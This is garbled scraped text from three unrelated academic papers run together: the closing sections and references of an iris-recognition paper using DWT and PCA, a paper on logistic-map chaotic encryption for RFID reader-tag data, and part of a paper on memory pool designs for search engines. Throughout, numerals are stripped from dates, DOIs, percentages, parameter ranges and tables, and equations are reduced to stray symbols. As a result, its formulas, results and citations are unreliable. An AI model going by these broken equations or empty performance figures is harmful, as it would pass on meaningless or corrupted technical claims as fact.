. . . . gabor filter + pca based feature extraction . . . . . . . . . . . proposed feature extraction technique . . . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of classification-time of our proposed technique with varying testing samples. full-size doi: . /peerjcs. /fig- conclusions in this paper, we proposed a technique that used principal component analysis (pca) based on discrete wavelet transformation (dwt) for extracting the optimum features of iris images and reducing the runtime of classification of these iris templates. the point of using dwt behind pca is to reduce the iris template resolution. dwt converts the iris image into four frequency bands, and one frequency band instead of four has been used for further feature extraction by using pca. as the resolution of iris template has been reduced by dwt, so the runtime of classification will be reduced. experimental evaluation using the casia iris image database (ver. ) clearly demonstrated the proposed technique performs in a very efficient manner. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • humayan kabir rana conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • md. shafiul azam conceived and designed the experiments, contributed reagents/mate- rials/analysis tools, authored or reviewed drafts of the paper. • mst. rashida akhtar prepared figures and/or tables, authored or reviewed drafts of the paper. • julian m.w. quinn approved the final draft, review and editing. • mohammad ali moni approved the final draft, review and editing. data availability the following information was supplied regarding data availability: the codes and raw data are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references acharya ur, mookiah mrk, koh je, tan jh, bhandary sv, rao ak, hagiwara y, chua ck, laude a. . automated diabetic macular edema (dme) grading system using dwt, dct features and maculopathy index. computers in biology and medicine : – doi . /j.compbiomed. . . . barpanda ss, sa pk, marques o, majhi b, bakshi s. . iris recognition with tunable filter bank based feature. multimedia tools and applications ( ): – doi . /s - - -z. czajka a, bowyer kw, krumdick m, vidalmata rg. . recognition of image- orientation-based iris spoofing. ieee transactions on information forensics and security ( ): – doi . /tifs. . . daugman jg. . high confidence visual recognition of persons by a test of statistical independence. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . firake sg, mahajan pm. . comparison of iris recognition using gabor wavelet, principal component analysis and independent component analysis. international journal of innovative research in computer and communication engineering ( ): – doi . /ijircce. . . frucci m, nappi m, riccio d, di baja gs. . wire: watershed based iris recognition. pattern recognition : – doi . /j.patcog. . . . galdi c, nappi m, dugelay j-l. . multimodal authentication on smartphones: combining iris and sensor recognition for a double check of user identity. pattern recognition letters ( ): – doi . /j.patrec. . . . hamd mh, ahmed sk. . biometric system design for iris recognition using intelligent algorithms. international journal of modern education and computer science ( ): – . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /tifs. . http://dx.doi.org/ . / . http://dx.doi.org/ . /ijircce. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj-cs. jyoti p, parvati b, sandeep kg, shubh lakshmi a. . new improved feature extraction approach of iris recognition. international journal of computer systems ( ): – . ma l, tan t, wang y, zhang d. . efficient iris recognition by characterizing key local variations. ieee transactions on image processing ( ): – doi . /tip. . . moni m, ali as. . hmm based hand gesture recognition: a review on techniques and approaches. in: computer science and information technology, . iccsit . nd ieee international conference on. piscataway: ieee, – . nabti m, bouridane a. . an effective and fast iris recognition system based on a combined multiscale feature extraction technique. pattern recognition ( ): – doi . /j.patcog. . . . naseem i, aleem a, togneri r, bennamoun m. . iris recognition using class-specific dictionaries. computers & electrical engineering : – doi . /j.compeleceng. . . . rana hk, azam ms, akhtar mr. . iris recognition system using pca based on dwt. sm journal of biometrics & biostatistics ( ): doi . /zenodo. . tieniu tan zs. . center for biometrics and security research. available at http: //www.cbsr.ia.ac.cn/china/iris% databases% ch.asp (accessed on november ). umer s, dhara bc, chanda b. . a novel cancelable iris recognition system based on feature learning techniques. information sciences : – doi . /j.ins. . . . verma p, dubey m, basu s, verma p. a. hough transform method for iris recognition—a biometric approach. international journal of engineering and innovative technology ( ): – . verma p, dubey m, verma p, basu s. b. daughman’s algorithm method for iris recognition—a biometric approach. international journal of emerging technology and advanced engineering ( ): – . yu-hsiang w. tutorial: image segmentation. graduate institute of communication engineering. available at http://disp.ee.ntu.edu.tw/meeting/%e % %b %e %bf% /segmentation% tutorial.pdf (accessed on november ). zhao h, wang j, ren x, li j, yang y-l, jin x. . personalized food printing for portrait images. computers & graphics : – doi . /j.cag. . . . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /zenodo. http://www.cbsr.ia.ac.cn/china/iris% databases% ch.asp http://www.cbsr.ia.ac.cn/china/iris% databases% ch.asp http://dx.doi.org/ . /j.ins. . . http://disp.ee.ntu.edu.tw/meeting/%e % %b %e %bf% /segmentation% tutorial.pdf http://disp.ee.ntu.edu.tw/meeting/%e % %b %e %bf% /segmentation% tutorial.pdf http://dx.doi.org/ . /j.cag. . . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , application of chaotic encryption in rfid data transmission security yang jianfang school of computer science and engineering xi’an technological university xi’an, china e-mail: perfectyjf@ .com liu baolong school of computer science and engineering xi’an technological university xi’an, , china e-mail: liu.bao.long@hotmail.com yao huimin eighth of production plant, the company china petrdeum changing oilfield, xi’an xi’an, , china abstract—in order to improve the security performance of data transmission in the rfid system, the sequence generated by the chaotic map is used to encrypt the data transmitted between the reader and the tag in the rfid. based on the unpredictability, extreme sensitivity to initial conditions, and pseudo-random characteristics of chaotic sequences, the information of each electronic tag is encrypted with a unique chaotic sequence. the same operation mechanism is used to encrypt and decrypt data, and a security model based on chaotic encryption is established. at the same time, the read/write control mechanism and security issues are explained. keywords-chaotic encryption; chaotic sequence; rfid system; security model; i. introduction radio frequency identification (rfid), which is a wireless non-contact automatic identification technology, automatically identifies surrounding objects through radio frequency signals, spatial coupling (including inductive coupling and electromagnetic coupling). the basic components of rfid system mainly include background server, reader and tag. in the rfid data transmission, the wired transmission between background server and reader is considered as a secure channel, while the wireless transmission between reader and tag is considered as an unsafe channel. the basic components of the rfid system are shown in the figure: background server contr ol sectio n wireless transmissi on part reader tag data、energy interaction space coupling element wired channel wireless transmission secure channel unsafe channel figure . diagram of the components of the rfid system. rfid technology has been widely used in various fields due to its low cost, fast recognition speed and long service life, such as warehouse transportation management, train/car identification, baggage security inspection, access control attendance and so on. however, a lot of security problems have emerged in the process of widespread application of rfid, and it is precisely because of the remaining security problems of rfid technology that its further application and development are restricted. the security issues of rfid technology mainly come from the wireless transmission channel of readers and electronic tags, including privacy theft between authentication and data transmission. the authentication problem mainly includes the confirmation of the legality of readers and electronic tags, while the data privacy issues include tracking and leaking data information [ ]. the purpose of the rfid system is to popularize the application, which requires that the cost of the reader and the electronic tag in the rfid cannot be too high, and the overly complicated security algorithm cannot be used doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , in the tag, which creates a difficulty for the security solution of the rfid to some extent. in most of the currently proposed rfid system security solutions, it can be roughly divided into physical security methods, cryptographic-based security methods, and a combination of the two. the physical security method is mainly for the protection of electronic tags, including kill command mechanism, electrostatic shielding, blocking tags, active interference, etc [ ]. some of these methods can affect the functionality of the tag. for example, the kill command mechanism can't respond to the reader's commands by making the tag ineffective. this prevents the corrupted tag from being activated again and cannot be used again. although electrostatic shielding can shield the interference from illegal readers or tags, it can also make the tag unrecognizable by legitimate readers and cannot be used effectively. the blocking tag evades the legal tag by simulating a large number of tags, and the active interference is to protect the legitimate tag from being detected by sending unwanted electromagnetic signals to interfere or hinder the operation of the illegal reader. the security method based on cryptography may generally include a security protocol based on a hash function, an encryption algorithm, read and write access control and so on. chaos is a complex behavior controlled by nonlinear dynamic laws and is a similar random phenomenon that appears in deterministic systems. it has the characteristics of extreme sensitivity of initial values, long-term unpredictability, randomness, and similar broadband spectral noise. these characteristics make chaotic systems very suitable for information encryption [ ]. logistic mapping is one of the most typical types in chaotic systems. the content of this paper is mainly to use logistic chaotic map to generate chaotic sequences to encrypt the data transmitted between readers and tags in rfid system, which guarantees rfid system security to some extent. ii. chaotic sequence encrypts rfid transmission data a. introduction to chaotic mapping the essence of chaotic encryption is serial cipher encryption. the basic principle is to divide the plaintext data into multiple parts of continuous characters, and then use the generated chaotic key stream sequence to perform encryption calculation with the plaintext characters bit by bit, and use the synchronous generated key stream when the sequence is decrypted, and its basic schematic is shown below: key sequence generator key sequence generator key sequence ki key sequence ki encryption algo rithm ek decryption algorithm dk produce produce action action cleartext information ciphertext information public channel cleartext information synchronization key figure . data information encryption/decryption schematic. the chaotic sequence generator is the core of chaotic encryption, which used to generate the chaotic key sequence. it then converted into an encrypted sequence for encrypting plaintext information through the conversion operation. the chaotic sequence generator can be represented by several parts in the following figure: initial value converted to real value chaotic map iteration to generate mapping sequence map sequence convert encryption sequence figure . chaotic sequence generator process diagram. international journal of advanced network, monitoring and controls volume , no. , chaotic map is an important part of chaotic sequence generator, and its general form can be expressed as:  )( nnn xxx     among them,  represents the system parameter, its value range is ( , ), nx represents the iteration value, and takes values in the range of [ , ]. the above equation is used as a mathematical equation for chaotic mapping, and a chaotic iterative sequence for encryption is generated by multiple iterations. based on the purpose of deep analysis of the characteristics of logistic mapping, this paper is simulated by matlab, and the logistic mapping bifurcation diagram obtained by taking the initial value is . , while the parameter values are different, is shown in the following figure: figure . logistic map bifurcation diagram. as can be seen from the above figure, the logistic map is from the double-period bifurcation into the chaotic state. when the value of  is about . ,the logistic map enters the chaotic state. therefore, the  value range of the logistic map in the chaotic state is ( . , ), and although the logistic map is a one-dimensional system, it can generate complex chaotic behavior. it can be found that the logistic mapping system only generates chaotic behavior when the initial value and the parameter value are within a certain range, and the degree and randomness of chaos are also affected by different initial values and different parameters. b. implementation of chaotic encryption the chaotic sequence is a sequence of chaotic real values generated by chaotic mapping after multiple iterations, and then formed by some transformation operations. theoretically, the chaotic sequence is a non-periodic sequence with statistical properties close to gaussian white noise [ ]. the initial value and parameter value required for chaotic mapping in the process of starting the iteration are determined by the label, the initial value x is obtained by the serial number of the unique identification label, and the value of parameter  is obtained by the read operation keyword, and it is determined according to the user's own needs. thus, there exists a security policy that the data information of each tag uses a unique chaotic sequence to encrypt. in addition, the iterative sequence generated by the chaotic map is the real field value, and the data processed by the rfid is a binary field. therefore, the real field value generated by the chaotic map must be converted into a binary sequence for encryption, and the corresponding domain conversion is described in the next section. the following is a detailed explanation of the general encryption process of logistic chaotic map. the specific process is as follows: a) select the parameter value for  in ( . , ), and design the chaotic sequence generator using ( ) to generate the key stream factor sequence; b) use the serial number of the tag as the initial value and enter it into the logistic system; c) iterate from the current position; d) converting the iterative chaotic real value into a binary form of the key stream sequence, extracting a part as an encrypted sequence; e) select the plaintext data of the specified location as the data to be encrypted; f) the binary encryption sequence extracted in step d) with the plaintext information sequence to perform encryption calculation to obtain a ciphertext sequence; g) the current operation track is used as the initial parameter of the next stage of encryption, and is reserved for use; h) determine whether the encryption operation is completed. if it is completed, it will enter the end state, otherwise it will return to step c). the above process can be represented by a flow chart as follows: international journal of advanced network, monitoring and controls volume , no. , begin determining logistic chaotic mapping equation deter mine initial values and parameter values system iterate specified number of times chaotic real sequences convert into binary sequences encryption calculation with plaintext information generate c iphertext sequence whether the encr yption is complete end the current operation track is used as the initial paramet er of the next stage of encryption figure . logistic chaotic encryption flow chart. it can be seen that the information is written into the electronic tag after being encrypted by the uniquely determined chaotic sequence, which greatly improves the security of the tag data to a certain extent. c. domain conversion of chaotic systems and encryption systems the domain of chaotic system processing is the real number field, and the data processed by the rfid system is binary. this inevitably requires the conversion of real and binary values. the conversion mechanism between them is introduced below. when the chaotic sequence generator iteratively generates the chaotic sequence, it is necessary to determine the initial value and the parameter value. in the process of designing, the initial value and the parameter value are associated with the label, and the serial number of the unique identification label is used as the initial value, and the user-defined read operation keyword is used as the parameter value. here, the serial number and the read operation key are expressed in binary form. the process of converting the real value is as follows: initial value calculation process: assuming that the rfid system uses a -bit binary number, and the range in which the serial number is converted to a decimal number is ( , ). the initial value x of the logistic chaotic system ranges from ( , ), first the calculation factor of x is . /) (   , the value which obtained by converting the binary number of the serial number into a decimal number and multiplying by the calculation factor is taken as the value of the initial value x . listed below: the binary form of the serial number ( ) converted to a decimal number of , multiplied by the calculation factor ( .   ) and the initial value x = . . parameter value calculation process: in the rfid system, the read operation keyword is also a -bit binary number. the value of the parameter  in the logistic chaotic system is ( . , ). first, the calculation factor of the parameter  is determined to be . /) . (   , and the binary number corresponding to the parameter  is converted into a decimal number and multiplied by the calculation factor, and finally . is added as the decimal value of the parameter  . listed below: the binary form of read operation keyword ( ) is converted to a decimal number of , which multiplied by a calculation factor ( .   ) and equal to . , parameter value  = . + . = . . it should be noted that the initial value x is determined by the serial number of the unique identification tag, which indicates that its uniqueness determines that the chaotic sequence iterated by is also uniquely determined, and can be utilized as a private key in the encryption and decryption system. the parameter  is determined by the read operation keyword, and the read operation keyword can be shared by the reader and the tag, and can be utilized as a public key in the encryption and decryption system. the above is the process of converting the binary value into a real value when the chaotic sequence is started. after the chaotic encryption sequence is obtained, it needs to be binarized when encrypting the data transmitted between the reader and the tag in the rfid system. the chaotic signal  nx is converted into a binary sequence stream  nb ,and the quantization international journal of advanced network, monitoring and controls volume , no. , function )]([ nxt must be introduced in the process of conversion. the mathematical definition is as follows [ ][ ]:                 k i i k i i inx inx nxt u u k k )( )( )]([  where k is an arbitrary integer greater than , ,,, kkk iii are k consecutive contiguous partitions of the initial value x . the above equation shows that if the chaotic signal  nx falls within the defined interval of the odd number of the quantization function as the initial bit, the corresponding binary value is , if it falls within the defined interval of the even number of the quantization function as the initial bit, the corresponding binary value is . after the conversion, because of maintaining the good randomness and unpredictability of the chaotic sequence )}({ nx , the experimental analysis proves that the above quantitative method has excellent statistical characteristics such as uniform - ratio distribution and autocorrelation [ ]. iii. rfid system security model and read/write control mechanism, security description a. rfid system security model the chaotic sequence generated by the above method is used to encrypt and calculate the data information written in the tag, and then sent to the wireless transmission part of the reader for transmission, and the data read back by the tag, the reader also uses the same chaos sequence to decrypte and sent to the background server for processing. in this link, the data touched by the tag, the wireless transmission and reception part and the airborne signal transmission are all chaotically encrypted data, and the ciphertext does not have any useful information. without knowing the structure of the reader and the details of chaotic encryption, it is impossible to illegally obtain the data in the tag to be decrypted into the original data information, which greatly improves the confidentiality and security of the rfid system. the security model of the rfid system is shown below: control section wireless transmis sion part reader tag background server chaotic encryption module illegal listener secure channel unsafe channel airborne wireless transmission chaotic ciphertext form figure . rfid system security model. based on the above rfid system security model, coupled with the read and write control mechanism of the next section, the security of rfid data is effectively guaranteed. b. read and write control mechanism of chaotic encryption the legality of the reader and the tag must be verified before the rfid data transmission, which requires the establishment of a read-write control mechanism between them. this control mechanism is established in the case of chaotic encryption, which is in the unsafe communication channel between the reader and the tag. the read and write control mechanism of the rfid system is shown in the following figure: background server reader tag request,q (f ) qid e (q, f ) qid (k , id ) rt tag k e (id ) rt tag ( , x ) tag  figure . read and write control mechanism after chaotic encryption. international journal of advanced network, monitoring and controls volume , no. , the basic process is as follows: rt k is a shared key only by legitimate readers, tags, and servers, and tagid is a unique number that identifies tag information. a) the reader sends an authentication request to the surrounding tags, the tag is activated and waits for the command; b) the tag calculates the received random number q and its own tagid , such as ),( tagqid idqff  , the f operation is a reversible operation, then the tag encrypts qidf by the shared key rtk to )()( qidkqid fefe rt , and then the encrypted result )( qidfe sent to the reader; c) after the reader receives the )( qidfe , the decryption operation obtains qidf , and then sends it to the background server together with the random number q; d) the background server calculates f reversible operation to get ' ta g id , and queries the local tagid to see if ' ta gta g idid  exists. if it exists, it proves the validity of the label, and then sends the matching ),( tagrt idk to the read. , otherwise the information which returned to the reader is that the tag is illegal; e) after the reader receives the information ),( tagrt idk of the background server, it encrypts and calculates ),()( tagrttagk idkfide rt  , and the f operation is reversible and then sent to the label; after the tag receives )( tagk ide rt , it calculates ))(,( ' ta gkrtta g idekfid rt   to see if it is equal to its own tagid . if it is equal, it proves the legality of the reader, so the tag will. passed the data information ),( tag x in the memory to the reader. after the reader obtains the parameter  and the data information tagx , which generates a chaotic decryption sequence together with the initial value x ,and decrypted to obtain the original correct information with the obtained data information. if they are not equal, the reader is not legal and the tag does not respond. c. safety instructions in the rfid system security model, the data transmitted by the rfid is encrypted by using the nonlinear characteristics of the chaotic system [ ],so that the encrypted rfid data ciphertext is basically similar to the white noise sequence, and there is no law at all, and it is completely impossible to find some characteristics of the original information. even if the information in the tag is illegally obtained, the original information cannot be decrypted correctly; under the strict protection of the read/write control mechanism, the identity information of the reader and the tag can be effectively verified, and the illegal reader and the illegal tag are avoided. it ensures the legality and security of the data transmitted by the rfid system. iv. conclusion in the context that the wireless unsecure channel between the reader and the tag of the rfid system may be subjected to various types of attacks, this paper uses the chaotic encryption sequence generated by the logistic chaotic map to encrypt the data transmitted by the rfid. the generated ciphertext sequence is equivalent to the noise sequence, having the characteristic of confusion and unpredictability. as a result, the difficulty of ciphertext analysis after encryption is greatly increased. it correspondingly enhanced security and confidentiality of rfid data. in addition, the read-write control mechanism and the domain conversion of the chaotic system and the encryption system are described in detail. however, the chaotic encryption mechanism discussed in this paper still has some drawbacks and shortcomings, such as how to solve the nonlinear dynamic degradation problem of logistic map and to ensure the randomness of chaotic sequences. these shortcomings need to be studied and solved in the future. acknowledgment this work is partially supported by science & technology program of weiyang district of xi'an city with project “ ". references [ ] zhang yong-ping, wang feng-jian. research of chaotic encryption based rfid system information security[j]. computer security, . [ ] zhao yu-hua. the research of security protocol in rfid system based on theory of chaotic cryptography[d].master's degree thesis of hunan university, . [ ] deng ai-ping, xiao ben. application of chaotic encryption algorithm in rfid secure mechanism[j].materials science and information technology, . international journal of advanced network, monitoring and controls volume , no. , [ ] ding xin. hyper-chaotic encryption based rfid system informaton security[j].china conference, . [ ] zhao yu-xin, wang wei, liu li-qiang. a design and analysis for non-linear combination chaotic stream cipher based on logistic map[j].journal of projectiles and guides, . [ ] qiu yue-hong, he chen, zhu hong-wen. one chaotic map with infinite collapses and its quantified sequences[j].journal of shanghai jiaotong university, . [ ] wu hong, ding qun, zhou ping. logistic chaotic sequence design and aplication in data encription [j].journal of instrumentation, . [ ] geo-su yim. design of an rfid communication protocol using synchronized chaotic systems[j].journal of korea institute of information and telecommunications technology, . international journal of advanced network monitoring and controls volume , no. , research on optimization of memory pool management for high concurrent service requests liu pingping, lu zhaopan school of computer science and engineering xi’an technological university, xi’an ,china email: @qq.com abstract. in order to quickly and accurately return the information to the user after the keyword are entered, and to effectively reduce the effect on the performance of the program when the search system allocates and deal locates memory frequently under the high concurrency, the recoverable fixed length memory pool, recoverable variable length memory pool and allocate not free memory pool were designed. according to the different scenes features of the search engine. the result shows that, compared with the default system memory allocator, the efficiency of the recoverable fixed length memory pool is increased by . % ,the efficiency of the recoverable variable length memory pool is increased by . % and the efficiency of the allocate not free memory pool is increased by . %. keywords: high concurrency, search engine, memory pool, distributor . introductiong the search engine is one of the most important applications of the internet, which involved in information retrieval, distributed processing, semantic web, data mining etc. the reasonable data structure design, the index and the high concurrent system structure are all the factors that influence the query speed. the basic principle of the search engine has been very stable, but in terms of service, quality and performance needs to be optimized. most of traditional search engines use keyword matching mode, the system manages memory when the application is not released too frequently, but in the face of massive data processing and storage, search engines seem powerless. there are some drawbacks that directly using the system call malloc/ free and new/delete[ ] to distribute and release the memory. for example, calling the malloc/new system in accordance with the “first match” and “best match” or other algorithms in free memory block table to find a free memory, the memory usage is not high; the system may need to merge free memory blocks when free / delete is called, which will result in extra time and space overhead; it is easy to produce a large number of memory fragments when used frequently, which reduces the efficiency and stability of the program; memory more prone to leaks[ ] that caused by memory size continues to increase and memory exhausted. for memory allocation problem, wang xiaoyin, a professor of xi’an university of posts and telecommunications, analysis and research about the method and principle of the establishment of the memory pool in the article of implementation and application of the memory pool in linux kernel[ ]. memory allocated in memory pool does not need to release, it will be released research on optimization of memory pool management for high concurrent service requests when the memory pool is destroyed. avantages:it speeds up memory allocation, when block of memory is enough, only conduct simple operation such as size judgment and pointer offset; small memory payloads are high, require less additional information; the memory pool allocated memory usually do not need a separate release, but a unified recovery; in addition to using memory allocation functions instead of malloc, no other special conventions are used. therefore, to compare of the traditional search engine memory allocation and the memory poolallocation. in this paper, different memory pools are designed for different application scenarios, it managememory allocation to get the fastest allocate and release speed. for the user’s query, the system’s memory management is completely taken over by the programmer, which is more conducive to investigate problem and optimize system, and quickly return a satisfied result for customer. . pinciples and key technologies of search engine search engine is based on the information extracted from the web site to establish the database, search the relevant records of user query condition matching, and then return the results to the user according to a certain order. the working principle[ ] of search engine is divided into four steps: first, using web crawler technology[ ] to automatically grab the web page from the internet, then analysis the original web page, and set up an index database, and finally searching and sorting in the index database .when there are multiple threads operating, if the system only has one cpu, it can not be carried out more than one thread at the same time, it can only divided the running time of cpu into several periods, then allocate the period of time to each thread, a thread code is run in a time, other threads are hanged up, this way we call concurrency. in the condition of high concurrency, the search system frequently allocate and recover memory will degrade the performance of program and the memory is used in a particular way, and pay the cost of performance on the function that is not required. for long-running background service system, the performance decrease mainly due to the default memory management is a universal, and general memory management usually consider many factors, including the thread, size, recovery time, distribution, frequency and so on. for this reason, it is common to consider use of the memory pool to manage memory allocation, rather than simply using new/delete, malloc/free for dynamic memory allocation. by designing a dedicated memory pool to allocate specific memory and optimize performance in different search application scenarios of search system, and to enhance the mass data storage and search speed, in order to solve the problem of universal memory. . principle of memory pool memory pool[ ] is a way of memory allocation, is a device that can dynamically allocate memory. it can only be used by a specific kernel component (that is, the owner of the pool). owners usually do not directly use the memory pool, when the common memory allocation fails, the kernel call a particular memory pool function to extract the memory pool, in order to get the extra memory. so the memory pool is only a memory of the kernel memory, used at a specific time. as shown in figure , the memory pool contains a total of memory blocks. when the memory pool is initially generated, only one block of memory is applied to the system, and the returned pointer acts as the head of the entire memory pool. after the application of the continuous demand for memory, memory pool judgment need to dynamically expand, then once again to apply for a new memory block of the system, and all of these memory blocks linked by pointers. international journal of advanced network monitoring and controls volume , no. , for the operating system, it has been allocated four equal-sized memory blocks for the application program. for example, on the fourth block of memory to enlarge, which contains a part of the memory pool information and three equal size memory pool units. the unit and unit are free, unit has been allocated. when application program need to allocate a unit size of memory through the memory pool, only need a simple traversal of all pool size information, then locate quickly the free memory pool block unit. then according to the size of the block position information directly locate the first free unit address, return the address and mark the next free unit; marking directly the corresponding memory unit of the memory pool size information is free when the application program release a memory pool unit. figure. the working principle of memory pool . small object allocation technology due to the application of memory block size of memory pool is uncertain, usually directly use the api of new and malloc to apply for allocating memory. it is not effective for the small object allocation, when frequently used will cause a large amount of memory fragmentation and then reduce the performance, so the small object memory allocation technology[ ] suitable for the small object memory allocation is used here. the size and number of blocks can be set in the construction period of the small object distributor. the chunk layer contains logical information, it can configured and returned the block from memory. once there is no free block in the chunk layer, the function returns zero. small object pool layer contains a vector, chunk objects stored inside, the chunk layer has been extended. there is a chunk queue, which stores all the information, there are two chunk pointers, one pointing to the currently available chunk, one pointing to the current with the release of a pointer. . scene analysis of search engine system in this paper, analyzing the characteristics of the three scenes, fixed length scene, size is not fixed scene and multiple allocation scene, designing the corresponding memory pool. ) fixed length scene in the existing search engine system, cache design takes advantage of the hash tables, original system use the new and delete functions for the allocation and release of each node of the hash table, and the size of the node is fixed, according to the allocation and release of the fixed size nodes, a memory pool is designed to improve the speed of cache allocation and release. a lot of places use the map of stl[ ] in research on optimization of memory pool management for high concurrent service requests the present search engine system, and the allocation and release of memory of each node in the map is managed by the distributor in the stl, take over the fixed node memory allocation and release by itself, enhance efficiency, easy to debug. based on the above two scenarios, the common is that how to deal with node fixed size, design a small object dispenser to distribute and release the fixed size memory node. ) size is not fixed scene in the cache management of the currents earch system, the search results are put into the cache, which is helpful for the next search, the size of each node in the cache is uncertain, and the time to enter the cache and propose cache can not be estimated. in the update module of the current search system, which manages the update and delete of the document, but the size of the document and the time of the update is unknown. for this scene, it can design a recoverable variable length memory pool, the lock can be added to deal with base on the characteristics of cache multi thread[ ]. ) multiple allocation scene the current search engine will return a result within m size after input a keyword, and a lot of information that comes with results will be allocated and released by using new and delete function, it cause that the new function used frequently, and affect efficiency and bring memory fragments[ ]. after analysis, the search engine return the result sat the same time, memory is frequently allocated, the number of release carried out only when the results of the query are returned, so the factor of frequent distribution should be considered, and the total capacity is not more than m, therefore, it is consider to allocate a large chunk of memory, after which all of the small memory is allocated, and finally released through the interface. based on this scene design allocate not free memory pool. . memory pool design and realize based on the high concurrency three scenarios are obtained by analyzing the current search engines: hash table insert delete, cache update and document update module, query result return. three memory pools are designed for the three scenarios: recoverable fixed length memory pool and recoverable variable length memory pool and allocate not free memory pool were designed. the design structure of the search system memory pool is shown in figure . figure. the design framework of memory pool of search system international journal of advanced network monitoring and controls volume , no. , . recoverable fixed length memory pool recoverable fixed length memory pool is small object distributor, it divided into layers structure. as shown in figure , the bottom layer is the chunk object, each chunk manages a large chunk of memory, which contains an integer number of fixed size block. chunk contains logical information, the user can configure and return the block according to it. when the chunk is no longer remaining blocks, the configuration fails and returns to zero. the second layer is fix allocate, which base on the first layer, using the known vector to expand the first layer and ensure that the size of the distribution can be extended. the third layer is small object allocator, which provide universal distribution and return function. the third layer expand base on the second layer, it provide multiple second layer objects, it make the fixed length of the distribution technology turn into a variable length distribution technology. the fourth layer is small object, it made a package for the third layer, which provides a number of generic interfaces for the third layer and some common interface, extend it into a multi thread available distributor. through layer by layer expansion, not only to ensure the release efficiency of the distribution, but also to better package the internal structure together, it not visible to the outside. by providing a common interface, to make it used like the operating system comes with the default memory. figure. the structure of small object distributor . recoverable variable length memory pool recovery variable length memory pool is a multi-threaded, variable length, recyclable memory pool, similar to hash table. a linked list indicates an assignable size range, each element in the list is a specific size of memory block pointer, which point to a list of memory blocks, to find specific head pointer by aligning, and then assign a node outside in the list. the elements in the range will be allocated through the new, when released, it will be returned to the pool for the next allocation, and beyond the range of elements also be allocated through new, but when released, it directly call delete, and return to the operating system. about the factors of thread, add lock to ensure the thread safety after the specified by the constructor. mainly includes block header layer, tragctrlunit layer and recyclelitepool layer. the structure of the graph is shown in figure . block header layer is the bottom of the distribution structure, nctrlindex indicates the size of block research on optimization of memory pool management for high concurrent service requests distribution, pnextblock indicates the next block, the structure is linked list structure, the whole structure is union type, which save space and improve efficiency. the tragctrlunit layer is a headpointer of each blockheader layer, and also contains a member that indicates the number of blockheader objects. recyclelitepool layer contains the thread element, the lock element, thetagctrlunit layer pointer, some count elements and a memory distributor, default for the new distribution and delete function to delete. figure. the structure of recyclelitepool . allocate not free memory pool allocate not free memory pool is divided into four layers: memory chunk layer: the bottom of the allocation block, there are three members inside, one indicates block size, one indicates location of initial address, one indicates currently available location. chain of memory chunk layer: memory chunk object is organized into a two-way linked list. simple allocate poilcy layer: this layer accept the request of distribution, change the size to be allocated not less than the size of memory chunk, and then added to the two-way linked list, the pointers of current distribution block point to the new block. stagepool layer: this layer is the outermost layer, the default template parameter is simple allocatepolicy type, which provides external interface for distribution and release. the overall structure of the stagepool contains a chunk type pointer, which point to the currently allocated block, the allocation request are looked for from the current block every time, when the margin is not enough, it create a new block inserted into the list, select allocation strategy through the template parameter of allocate policy. the structure of the graph is shown in figure . international journal of advanced network monitoring and controls volume , no. , figure. the structure of stagepool . performance test and analysis through the centos operating system, the compiler and debugging tools of vim, g++ and scons, some scenarios are designed to simulate the actual scene of the search engine to test the performance differences between the default memory distributor and the designed distributor. . performance test and analysis of the small objects distributor ) for the small objects allocator test, when the amount of data is , by testing the system function of new/delete and the memory pool interface function of allocate/deallocate. record groups of data, as shown in table , by analyzing and calculating the time difference, the small objects allocator is increased by . % relative to new of system, and compared with the delete, it is increased by . %. ) for the thread adapter hash table test, using the node allocator class to match the hash table, construct an identical class of default allocator, the internal partition function use new/delete to achieve, using template parameters to match a hash table. for the single threaded test: for node allocator and default allocator, to applicate and release block, assuming that the program is running a fixed time of s, during this time repeated inserted and delete operation; multi-threaded test: for node allocator and default allocator, to open the same number of threads, and execute thread function, to insert and delete data for corresponding hash tables. table indicates the test data of hash table. by analyzing and calculating: in the case of single threaded, in terms of distribution, the efficiency of node is increased by . %, for the release, the efficiency of node is reduced by . %; in the case of multiple threads, in terms of distribution, the efficiency of the node is increased by . %, for the release, the efficiency of node is reduced by . %. ) for the test of the small objects allocator adapter map container, to achieve a small object alloator type, internal distribution released is achieved by small objectpool, through the map function, fit small objectallocator to map, map node distribution and release call interface of allocate/deallocate of small objectpool; similarly to achieve a newallocator type, internal distribution release is achieved by research on optimization of memory pool management for high concurrent service requests new/delete interface, also mapping to the map through the constructed function; to compare with distributor type provided by the system. single threaded test: three map were inserted into data; multi threaded test: map data is inserted and emptied by three map circulation within a certain time. table indicates the test data of adapter map. by analyzing and calculating: in the case of single threaded, in terms of default, the efficiency is increased by . %, for the new, the efficiency is increased by . %; in the case of multiple threads, in terms of default, the efficiency is increased by . %, for the new, the efficiency is increased by . %. table testing data of the small objects distributor(µs) number of times new allocation time new release time small allocation time small release time average time . . . table testing data of thread adapter hash table(µs) number single thread single thread single thread single thread multi-threaded multi-threaded multi-threaded multi-threaded of times default default node node ded default ded default ded node ded node allocation release allocation release allocation release allocation release average time . . . . . . . . international journal of advanced network monitoring and controls volume , no. , table testing data of adapter map multi thread(µs) number of times single thread default single thread small single thread new multi-threaded default multi-threaded small multi-threaded new 